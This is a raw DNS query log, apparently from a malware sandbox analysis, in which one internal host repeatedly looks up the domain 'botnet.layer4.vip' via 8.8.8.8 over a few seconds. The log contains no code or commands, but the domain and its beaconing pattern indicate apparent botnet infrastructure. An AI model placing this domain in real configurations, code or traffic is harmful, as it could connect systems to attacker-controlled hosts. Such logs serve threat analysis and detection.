                                  Apr 9, 2023 03:30:58.800673962 CEST192.168.2.238.8.8.80x838Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.825072050 CEST192.168.2.238.8.8.80xb965Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.849596977 CEST192.168.2.238.8.8.80xb965Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.865516901 CEST192.168.2.238.8.8.80xb965Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.881294966 CEST192.168.2.238.8.8.80xb965Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.897078991 CEST192.168.2.238.8.8.80xb965Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.912657022 CEST192.168.2.238.8.8.80xe605Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.937455893 CEST192.168.2.238.8.8.80xe605Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.953274012 CEST192.168.2.238.8.8.80xe605Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.977469921 CEST192.168.2.238.8.8.80xe605Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.993449926 CEST192.168.2.238.8.8.80xe605Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.009546041 CEST192.168.2.238.8.8.80x21acStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.033960104 CEST192.168.2.238.8.8.80x21acStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.058074951 CEST192.168.2.238.8.8.80x21acStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.082468033 CEST192.168.2.238.8.8.80x21acStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.098320961 CEST192.168.2.238.8.8.80x21acStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.114365101 CEST192.168.2.238.8.8.80x3f8cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.129877090 CEST192.168.2.238.8.8.80x3f8cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.145317078 CEST192.168.2.238.8.8.80x3f8cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.169712067 CEST192.168.2.238.8.8.80x3f8cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.194416046 CEST192.168.2.238.8.8.80x3f8cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.219218016 CEST192.168.2.238.8.8.80xa18bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.243480921 CEST192.168.2.238.8.8.80xa18bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.267908096 CEST192.168.2.238.8.8.80xa18bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.292134047 CEST192.168.2.238.8.8.80xa18bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.308007956 CEST192.168.2.238.8.8.80xa18bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.332669973 CEST192.168.2.238.8.8.80xb336Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.348303080 CEST192.168.2.238.8.8.80xb336Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.364428997 CEST192.168.2.238.8.8.80xb336Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.380347013 CEST192.168.2.238.8.8.80xb336Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.396184921 CEST192.168.2.238.8.8.80xb336Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.412497044 CEST192.168.2.238.8.8.80xa026Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.437107086 CEST192.168.2.238.8.8.80xa026Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.461293936 CEST192.168.2.238.8.8.80xa026Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.477286100 CEST192.168.2.238.8.8.80xa026Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.493045092 CEST192.168.2.238.8.8.80xa026Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.509118080 CEST192.168.2.238.8.8.80xb31bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.533601046 CEST192.168.2.238.8.8.80xb31bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.549247026 CEST192.168.2.238.8.8.80xb31bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.573769093 CEST192.168.2.238.8.8.80xb31bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.589754105 CEST192.168.2.238.8.8.80xb31bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.605532885 CEST192.168.2.238.8.8.80x3101Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.629771948 CEST192.168.2.238.8.8.80x3101Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.645474911 CEST192.168.2.238.8.8.80x3101Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.670162916 CEST192.168.2.238.8.8.80x3101Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.685821056 CEST192.168.2.238.8.8.80x3101Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.711338997 CEST192.168.2.238.8.8.80x6fb7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.735908031 CEST192.168.2.238.8.8.80x6fb7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.760345936 CEST192.168.2.238.8.8.80x6fb7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.784842014 CEST192.168.2.238.8.8.80x6fb7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.809113026 CEST192.168.2.238.8.8.80x6fb7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.833904982 CEST192.168.2.238.8.8.80x4cfcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.849620104 CEST192.168.2.238.8.8.80x4cfcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.865123987 CEST192.168.2.238.8.8.80x4cfcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.880923986 CEST192.168.2.238.8.8.80x4cfcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.905062914 CEST192.168.2.238.8.8.80x4cfcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.929297924 CEST192.168.2.238.8.8.80x72caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.953824043 CEST192.168.2.238.8.8.80x72caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.978530884 CEST192.168.2.238.8.8.80x72caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.994275093 CEST192.168.2.238.8.8.80x72caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.010353088 CEST192.168.2.238.8.8.80x72caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.026038885 CEST192.168.2.238.8.8.80x46caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.050467014 CEST192.168.2.238.8.8.80x46caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.066436052 CEST192.168.2.238.8.8.80x46caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.082386971 CEST192.168.2.238.8.8.80x46caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.106874943 CEST192.168.2.238.8.8.80x46caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.122680902 CEST192.168.2.238.8.8.80x547Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.146830082 CEST192.168.2.238.8.8.80x547Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.162373066 CEST192.168.2.238.8.8.80x547Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.177951097 CEST192.168.2.238.8.8.80x547Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.202120066 CEST192.168.2.238.8.8.80x547Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.226227999 CEST192.168.2.238.8.8.80xd1adStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.250579119 CEST192.168.2.238.8.8.80xd1adStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.266592026 CEST192.168.2.238.8.8.80xd1adStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.282603979 CEST192.168.2.238.8.8.80xd1adStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.306694031 CEST192.168.2.238.8.8.80xd1adStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.322647095 CEST192.168.2.238.8.8.80x3c58Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.346674919 CEST192.168.2.238.8.8.80x3c58Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.371172905 CEST192.168.2.238.8.8.80x3c58Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.386949062 CEST192.168.2.238.8.8.80x3c58Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.411019087 CEST192.168.2.238.8.8.80x3c58Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.427122116 CEST192.168.2.238.8.8.80xfcbcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.451236963 CEST192.168.2.238.8.8.80xfcbcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.475320101 CEST192.168.2.238.8.8.80xfcbcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.499706984 CEST192.168.2.238.8.8.80xfcbcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.524252892 CEST192.168.2.238.8.8.80xfcbcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.548645020 CEST192.168.2.238.8.8.80x190fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.564452887 CEST192.168.2.238.8.8.80x190fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.588778973 CEST192.168.2.238.8.8.80x190fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.613137960 CEST192.168.2.238.8.8.80x190fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.637475967 CEST192.168.2.238.8.8.80x190fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.661853075 CEST192.168.2.238.8.8.80x3760Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.677707911 CEST192.168.2.238.8.8.80x3760Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.693207979 CEST192.168.2.238.8.8.80x3760Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.717293978 CEST192.168.2.238.8.8.80x3760Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.732903957 CEST192.168.2.238.8.8.80x3760Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.757497072 CEST192.168.2.238.8.8.80xaee7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.781547070 CEST192.168.2.238.8.8.80xaee7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.797524929 CEST192.168.2.238.8.8.80xaee7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.813005924 CEST192.168.2.238.8.8.80xaee7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.837025881 CEST192.168.2.238.8.8.80xaee7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.861382961 CEST192.168.2.238.8.8.80xf29eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.877186060 CEST192.168.2.238.8.8.80xf29eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.892669916 CEST192.168.2.238.8.8.80xf29eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.916774035 CEST192.168.2.238.8.8.80xf29eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.932636976 CEST192.168.2.238.8.8.80xf29eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.957132101 CEST192.168.2.238.8.8.80x83f0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.972594023 CEST192.168.2.238.8.8.80x83f0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.997064114 CEST192.168.2.238.8.8.80x83f0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.021178961 CEST192.168.2.238.8.8.80x83f0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.045630932 CEST192.168.2.238.8.8.80x83f0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.062000036 CEST192.168.2.238.8.8.80x73a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.086447001 CEST192.168.2.238.8.8.80x73a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.102560997 CEST192.168.2.238.8.8.80x73a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.126818895 CEST192.168.2.238.8.8.80x73a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.151004076 CEST192.168.2.238.8.8.80x73a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.166708946 CEST192.168.2.238.8.8.80x13e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.182621002 CEST192.168.2.238.8.8.80x13e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.198514938 CEST192.168.2.238.8.8.80x13e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.214378119 CEST192.168.2.238.8.8.80x13e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.238528967 CEST192.168.2.238.8.8.80x13e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.254241943 CEST192.168.2.238.8.8.80x5441Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.278307915 CEST192.168.2.238.8.8.80x5441Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.302762985 CEST192.168.2.238.8.8.80x5441Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.326941013 CEST192.168.2.238.8.8.80x5441Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.342856884 CEST192.168.2.238.8.8.80x5441Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.367485046 CEST192.168.2.238.8.8.80x2672Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.383202076 CEST192.168.2.238.8.8.80x2672Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.407520056 CEST192.168.2.238.8.8.80x2672Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.432111025 CEST192.168.2.238.8.8.80x2672Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.456738949 CEST192.168.2.238.8.8.80x2672Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.481520891 CEST192.168.2.238.8.8.80xaa47Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.507170916 CEST192.168.2.238.8.8.80xaa47Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.523102999 CEST192.168.2.238.8.8.80xaa47Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.547539949 CEST192.168.2.238.8.8.80xaa47Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.572309017 CEST192.168.2.238.8.8.80xaa47Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.597516060 CEST192.168.2.238.8.8.80xacadStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.613332033 CEST192.168.2.238.8.8.80xacadStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.637972116 CEST192.168.2.238.8.8.80xacadStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.662364006 CEST192.168.2.238.8.8.80xacadStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.678409100 CEST192.168.2.238.8.8.80xacadStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.694586992 CEST192.168.2.238.8.8.80x640eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.718947887 CEST192.168.2.238.8.8.80x640eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.743247986 CEST192.168.2.238.8.8.80x640eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.759210110 CEST192.168.2.238.8.8.80x640eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.783828020 CEST192.168.2.238.8.8.80x640eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.799885988 CEST192.168.2.238.8.8.80x80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.824481010 CEST192.168.2.238.8.8.80x80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.848639011 CEST192.168.2.238.8.8.80x80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.873184919 CEST192.168.2.238.8.8.80x80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.888856888 CEST192.168.2.238.8.8.80x80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.904958010 CEST192.168.2.238.8.8.80x3d0fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.929347038 CEST192.168.2.238.8.8.80x3d0fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.945388079 CEST192.168.2.238.8.8.80x3d0fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.969494104 CEST192.168.2.238.8.8.80x3d0fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.985061884 CEST192.168.2.238.8.8.80x3d0fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.009546041 CEST192.168.2.238.8.8.80xca3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.033660889 CEST192.168.2.238.8.8.80xca3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.058207035 CEST192.168.2.238.8.8.80xca3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.074052095 CEST192.168.2.238.8.8.80xca3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.089891911 CEST192.168.2.238.8.8.80xca3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.105479956 CEST192.168.2.238.8.8.80x3971Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.129859924 CEST192.168.2.238.8.8.80x3971Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.154525042 CEST192.168.2.238.8.8.80x3971Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.178801060 CEST192.168.2.238.8.8.80x3971Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.194742918 CEST192.168.2.238.8.8.80x3971Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.219844103 CEST192.168.2.238.8.8.80xe445Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.235548973 CEST192.168.2.238.8.8.80xe445Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.259712934 CEST192.168.2.238.8.8.80xe445Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.284202099 CEST192.168.2.238.8.8.80xe445Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.302205086 CEST192.168.2.238.8.8.80xe445Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.326333046 CEST192.168.2.238.8.8.80x7837Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.342236996 CEST192.168.2.238.8.8.80x7837Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.366597891 CEST192.168.2.238.8.8.80x7837Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.382049084 CEST192.168.2.238.8.8.80x7837Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.406016111 CEST192.168.2.238.8.8.80x7837Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.430073977 CEST192.168.2.238.8.8.80xf795Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.445580006 CEST192.168.2.238.8.8.80xf795Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.461488962 CEST192.168.2.238.8.8.80xf795Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.485565901 CEST192.168.2.238.8.8.80xf795Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.501017094 CEST192.168.2.238.8.8.80xf795Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.525167942 CEST192.168.2.238.8.8.80x5bf0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.541009903 CEST192.168.2.238.8.8.80x5bf0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.565171957 CEST192.168.2.238.8.8.80x5bf0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.580859900 CEST192.168.2.238.8.8.80x5bf0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.596762896 CEST192.168.2.238.8.8.80x5bf0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.612406015 CEST192.168.2.238.8.8.80x7c5eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.636615992 CEST192.168.2.238.8.8.80x7c5eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.661307096 CEST192.168.2.238.8.8.80x7c5eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.685913086 CEST192.168.2.238.8.8.80x7c5eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.707611084 CEST192.168.2.238.8.8.80x7c5eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.723527908 CEST192.168.2.238.8.8.80x5fcaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.748012066 CEST192.168.2.238.8.8.80x5fcaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.772485971 CEST192.168.2.238.8.8.80x5fcaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.797130108 CEST192.168.2.238.8.8.80x5fcaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.821705103 CEST192.168.2.238.8.8.80x5fcaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.837915897 CEST192.168.2.238.8.8.80x4bd1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.854012012 CEST192.168.2.238.8.8.80x4bd1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
